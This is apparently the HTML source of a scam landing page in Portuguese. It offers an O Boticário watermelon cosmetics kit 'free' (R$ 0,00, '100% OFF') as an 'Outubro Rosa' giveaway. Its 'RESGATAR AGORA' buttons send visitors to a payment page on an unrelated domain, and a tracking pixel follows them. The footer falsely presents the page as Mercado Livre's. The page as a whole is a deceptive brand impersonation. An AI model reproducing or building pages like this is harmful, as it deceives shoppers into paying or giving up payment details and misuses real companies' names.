<!DOCTYPE html><html lang="pt"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Resgate</title>
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
    <script src="js/tempo.js"></script>
    <script>
  window.pixelId = "67226fb2cc25bfd662c351ee";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script><script async="" defer="" src="js/pixel_1.js"></script>
<script async="" defer="" src="js/pixel.js"></script></head>
<body>


    <div style="background-color: #00a470; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: #ffffff">Promoção exclusiva: Outubro Rosa</div>

    <nav class="navbar" style="padding-top: 15px;">
        <div class="menu-icon" style="padding-right: 3%;">
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 0px; color: #00a470">menu</span>
        </div>

        <div class="logo-central">
            <img src="images/logo.svg" style="height: 3vh;" alt="Logo Central Vivara">
        </div>

        <div class="menu-icon" style="padding-right: 3%;">
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 0px; color: #00a470">shopping_cart</span>
        </div>
    </nav>

    


    
<!--
    <div style="display: flex; justify-content: space-between; flex-direction: row; padding: 10px;" class="container">
        <div class="stars">
          ★★★★★ <p style="margin-bottom: 0px;">(1281)</p>
        </div>
        <div class="lancamento">LANÇAMENTO</div>
      </div>
-->
    <p class="title" style="margin-top: 10px;">Kit O Boticário Melancia 7 Itens</p>


    <div class="carrossel carrossel-rosa">
        <div class="carrossel-inner" id="carrossel-inner-rosa">
          <img src="images/foto1.webp" alt="Imagem Rosa 1" style="display: block;">
          <img src="images/foto2.webp" alt="Imagem Rosa 2" style="display: none;">
          <img src="images/foto3.webp" alt="Imagem Rosa 3" style="display: none;">
          <img src="images/foto4.webp" alt="Imagem Rosa 3" style="display: none;">
          <img src="images/foto5.webp" alt="Imagem Rosa 3" style="display: none;">
          <img src="images/foto6.webp" alt="Imagem Rosa 3" style="display: none;">
          <img src="images/foto7.webp" alt="Imagem Rosa 3" style="display: none;">
          <img src="images/foto8.webp" alt="Imagem Rosa 3" style="display: none;">
        </div>
        <div class="indicadores" id="indicadores-rosa"></div>
        <button class="prev" id="prev-rosa">❮</button>
        <button class="next" id="next-rosa">❯</button>
      </div>


    <div class="product-info2">
        <div class="offer-tag2" style="background-color: #00a470;">LANÇAMENTO</div>

        <div class="old-price2">R$ 430,00</div>

        <span class="new-price2">R$ 0,00</span><span class="discount2">100% OFF</span>



    </div>


    <button class="pergunta-botao" id="botao" style="background-color: #00a470;" onclick="window.open('https://pay.swcamisas.shop/6YQPgjneo9egpxz' + window.location.search, '_blank')"> RESGATAR AGORA</button>
    
    <button class="fixed-button" id="fixed-button-boombox" href="#" onclick="window.open('https://pay.swcamisas.shop/6YQPgjneo9egpxz' + window.location.search, '_blank')">RESGATAR AGORA</button>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const mainButton = document.getElementById('botao');
            const fixedButton = document.getElementById('fixed-button-boombox');

            window.addEventListener('scroll', function() {
                const mainButtonRect = mainButton.getBoundingClientRect();

                if (mainButtonRect.top < 0 || mainButtonRect.bottom > window.innerHeight) {
                    fixedButton.classList.add('visible');
                } else {
                    fixedButton.classList.remove('visible');
                }
            });
        });
    </script>








    <br>
  <div class="divisoria"></div>
    <br>

<div class="container-products">
      
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> Itens desse Kit. </p>
    <div class="product-grid">
       
      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto4.webp" alt="Produto 1">
        <p>R$ 69,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto8.webp" alt="Produto 2">
        <p>R$ 27,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto7.webp" alt="Produto 3">
        <p>R$ 54,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto2.webp" alt="Produto 4">
        <p>R$ 49,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto3.webp" alt="Produto 5">
        <p>R$ 39,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto;  " src="images/foto6.webp" alt="Produto 6">
        <p>R$ 42,90</p>
      </div>

      <div class="product-item">
        <img style="width: 60px; margin: 0px auto; " src="images/foto5.webp" alt="Produto 7">
        <p>R$ 144,90</p>
      </div>
    </div>
  </div>


  <div style="padding: 20px;"> 
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> Combo Melancia (7 itens) </p>
    <p>Para os apaixonados por melancia, os produtos que vão te acompanhar todos os dias! Este Combo Melancia traz a fruta mais pedida no TikTok dos Egeo Lovers em fragrâncias suculentas, que inspiram um bem-estar energizante. Sinta uma rotina mais animada com esses produtos incríveis:</p>
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> EGEO MELANCIA</p>
    <p>Em Egeo Melancia Desodorante Colônia, a Melancia é a protagonista. Combinada as Notas Florais Aquáticas, sua fragrância fresca te transporta para uma cachoeira de sensações divertidas, para você mergulhar de cabeça. Uma perfumação frutal surreal, alegre e marcante!</p>
    <p>Família Olfativa: Frutal Amadeirado.</p> 
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> GEL ESFOLIANTE CORPORAL</p>
    <p>O Gel Esfoliante Corporal Cuide-se Bem Melancia vai deixar sua pele lisinha removendo as impurezas e células mortas. Deixa a pele perfumada e com sensação de hidratação. Com embalagem feita com papel reciclado, o produto oferece autocuidado prático e sustentável.</p> 
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> LOÇÃO HIDRATANTE CORPORAL</p>
    <p>A Loção Desodorante Hidratante Corporal Cuide-se Bem Melancia proporciona até 48 horas de hidratação, graças a fórmula rica em Manteiga de Karité e Glicerol. Sua textura cremosa é absorvida rapidamente. Assim, sua pele fica macia, perfumada e desodorizada.</p>
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> GEL HIDRATANTE REFRESCANTE</p>
    <p>O Gel Desodorante Hidratante Refrescante Cuide-se Bem Melancia combina uma textura levinha com a fragrância da Melancia oferecendo até 24 horas de hidratação. Ideal para usar no dia a dia, oferecendo uma refrescância imediata.</p>
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> DESODORANTE ROLL-ON</p>
    <p>O Desodorante Antitranspirante Roll-On Cuide-se Bem Melancia traz a fragrância frutal inspirado na melancia em uma fórmula de secagem rápida que mantém a hidratação natural da pele das axilas. Sua fabricação utiliza um processo 100% a frio, que entrega menos consumo de energia.</p>
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> MÁSCARA FACIAL</p>
    <p>A Máscara Facial Noturna Cuide-se Bem Melancia renova e melhora a textura da sua pele enquanto você dorme. Aprimora a hidratação da pele e deixa um aspecto lisinho, radiante e renovado. É livre de parabenos, silicone e petrolatos.</p>
    <p style="text-align: center; align-items: center; color: #00a470; font-size: 20px; font-weight: bold;"> GLOSS BRILHO LABIAL MELANCIA</p>
    <p>O Gloss Brilho Labial Intense Melancia traz o delicioso cheirinho e a doçura da fruta, deixa sua boca com o vermelhinho apetitoso da melancia. É um gloss que não gruda, não escorre e não borra ao longo do dia. Entrega a sensação de lábios hidratados, macios e confortáveis com um brilho dourado.</p>
    <br>
    <p>
        Nenhum produto O Boticário é testado em animais, ou seja, estes itens possuem selo Cruelty Free..
    </p>
</div>



    
    <div class="divisoria"></div>

    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>

    <script src="js/scripts.js"></script>

    <script>
        document.querySelectorAll('.thumbnails img').forEach(image => {
            image.addEventListener('click', function() {
                document.querySelector('.main-image').src = this.src;
            });
        });
        document.getElementById("boombox").addEventListener("click", timeAr);
    </script>




<style>
    .info-preço {
      padding: 0px 20px 20px 28px;
    }

    .informations {
      text-align: center;
    }

    .info-preço {
      border-radius: 20px;

    }
  </style>

<style>
    .container {
      display: flex;
      align-items: center;
      flex-direction: row;
      font-family: Arial, sans-serif;
    }

    .brand-name {
      font-size: 16px;
      font-weight: bold;
      margin-right: 10px;
    }

    .stars {
      color: #FFA500;
      /* Cor das estrelas */
      font-size: 25px;
      margin-right: 5px;
      display: flex;
      align-items: center;
    }

    .rating-text {
      font-size: 14px;
      color: #FFA500;
    }

    .pesquisar {
      background-color: #00a470;
    }

    .barra-pesquisa {
      display: flex;

    }

    .lancamento {
      border: 1px solid rgb(235, 49, 204);
      color: rgb(235, 49, 204);
      padding: 4px 8px;
      ;
      font-size: 10px;
      border-radius: 10px;
    }
  </style>

  <script>
    document.addEventListener('DOMContentLoaded', function () {
      function setupCarousel(carouselId, prevBtnId, nextBtnId) {
        const carouselInner = document.getElementById(carouselId);
        const images = carouselInner.getElementsByTagName('img');
        let currentIndex = 0;

        function showImage(index) {
          for (let i = 0; i < images.length; i++) {
            images[i].style.display = i === index ? 'block' : 'none';
          }
        }

        document.getElementById(prevBtnId).addEventListener('click', function () {
          currentIndex = (currentIndex - 1 + images.length) % images.length;
          showImage(currentIndex);
        });

        document.getElementById(nextBtnId).addEventListener('click', function () {
          currentIndex = (currentIndex + 1) % images.length;
          showImage(currentIndex);
        });

        showImage(currentIndex); // Exibir a primeira imagem inicialmente
      }

      // Configurar cada carrossel
      setupCarousel('carrossel-inner-rosa', 'prev-rosa', 'next-rosa');
      setupCarousel('carrossel-inner-roxo', 'prev-roxo', 'next-roxo');
      setupCarousel('carrossel-inner-branco', 'prev-branco', 'next-branco');
      setupCarousel('carrossel-inner-marrom', 'prev-marrom', 'next-marrom');
    });

    // Seleciona todos os cards e carrosséis
    const cards = document.querySelectorAll('.cards div');
    const carrosseis = {
      rosa: document.querySelector('.carrossel-rosa'),
      roxo: document.querySelector('.carrossel-roxo'),
      branco: document.querySelector('.carrossel-branco'),
      marrom: document.querySelector('.carrossel-marrom')
    };

    // Função para mostrar o carrossel correto com base na cor do card clicado
    function showCarrossel(cor) {
      // Esconde todos os carrosseis
      Object.values(carrosseis).forEach(carrossel => carrossel.classList.add('hidden'));
      // Mostra o carrossel correspondente
      carrosseis[cor].classList.remove('hidden');
    }

    // Adiciona o evento de clique em cada card
    cards.forEach(card => {
      card.addEventListener('click', () => {
        // Remove a classe 'active' de todos os cards
        cards.forEach(c => c.classList.remove('active'));
        // Adiciona a classe 'active' ao card clicado
        card.classList.add('active');

        // Verifica qual card foi clicado e mostra o carrossel correspondente
        if (card.classList.contains('card-rosa')) {
          showCarrossel('rosa');
        } else if (card.classList.contains('card-roxo')) {
          showCarrossel('roxo');
        } else if (card.classList.contains('card-branco')) {
          showCarrossel('branco');
        } else if (card.classList.contains('card-marrrom')) {
          showCarrossel('marrom');
        }
      });
    });

  </script>

  <style>
    .card {
      padding: 20px;
      width: 100%;
      border-radius: 8px;
      position: relative;
      background-color: #fff;

    }

    .price-original {
      text-decoration: line-through;
      color: #a0a0a0;
      font-size: 14px;
    }

    .price-current {
      font-size: 24px;
      font-weight: bold;
      color: #000;
      margin: 5px 0;
    }

    .price-installments {
      font-size: 14px;
      color: #000;
    }

    .installments {
      font-size: 14px;
      color: #757575;
    }

    .icon-heart {
      position: absolute;
      top: 20px;
      right: 20px;
      font-size: 44px;
      color: #757575;
      cursor: pointer;
    }

    .icon-heart:hover {
      color: #ff4d4d;
    }

    .gramatura {
      width: 20%;
      padding: 10px;
      box-shadow: 0 0 10px #a8a500;
      border-radius: 10px;
      margin-top: 5px;
      margin-bottom: 15px;
      margin-left: 20px;
    }


    .gramatura p {
      text-align: center;
      font-size: 20px;
      margin-bottom: 0px;
    }

    .preco {
      text-align: initial;
      margin-bottom: 5px;
      margin-top: 10px;
    }

    .valor {
      font-size: 27px;
      font-weight: 600;

    }

    .parcelas {}

    .carrossel {
      position: relative;
      width: 100%;
      overflow: hidden;
    }

    .carrossel-inner {
      display: flex;
      width: 100%;
      /* Assumindo que haja 3 imagens no carrossel */
      transition: transform 0.5s ease;
    }


    .carrossel-inner img {
      width: 100%;
      /* Cada imagem ocupará 100% da área visível do carrossel */
      object-fit: cover;
    }

    button.prev,
    button.next {
      position: absolute;
      top: 50%;
      transform: translateY(-50%);
      color: #00a470;
      border: none;
      padding: 10px;
      cursor: pointer;
      background-color: rgb(199, 198, 198);
      border-radius: 50px;
      font-weight: 900;
      font-size: 20px;
      box-shadow: 0 4px 6px 2px rgba(0, 0, 0, 0.4)
    }

    button.prev {
      left: 10px;
      width: 50px;
      background-color: #f8f8f8;

    }

    button.next {
      right: 10px;
      background-color: #f8f8f8;
      width: 50px;
    }

    .indicadores {
      position: absolute;
      bottom: 10px;
      left: 50%;
      transform: translateX(-50%);
    }

    .bola {
      display: inline-block;
      width: 10px;
      height: 10px;
      background-color: #ddd;
      border-radius: 50%;
      margin: 0 5px;
      cursor: pointer;
    }

    .bola.ativa {
      background-color: #333;
    }

    #comprar {
      background-color: #00a470;
      width: 100%;
      display: flex;
      color: rgb(255, 255, 255);
      font-size: 18px;
      justify-content: center;
      align-items: center;
      font-weight: 600;
      padding: 10px;
      border-radius: 10px;
      height: 65px;
    }

    .green {
      color: #00a470;
    }

    .tamanho-container {
      margin: 20px 0;
    }

    .tamanho-container h3 {
      font-size: 18px;


    }




    .cards {
      display: flex;
      justify-content: initial;
      gap: 10px;
      margin-top: 5px;
    }

    .card-rosa,
    .card-roxo,
    .card-branco,
    .card-marrrom {
      border: 1px solid #c0c0c0;
      /* Borda laranja */

      border-radius: 10px;
      width: 70px;
      /* Largura fixa para as divs */


      object-fit: cover;
      /* Para esconder qualquer conteúdo que ultrapasse a div */
    }

    .banner {
      height: 170px;
      margin-bottom: 30px;
    }

    .cores h1 {
      margin-bottom: 0px;
      margin-top: 10px;
      align-items: initial;
      display: flex;
      font-size: 18px;
    }

    .cards img {
      max-width: 100%;
      max-height: 100%;
      object-fit: contain;
      border-radius: 20px;
      /* Para ajustar a imagem dentro da div */
    }

    /* Classe para o card ativo com borda laranja */
    .active {
      border: 2px solid #ff5c0d;
    }
  </style>




</body></html>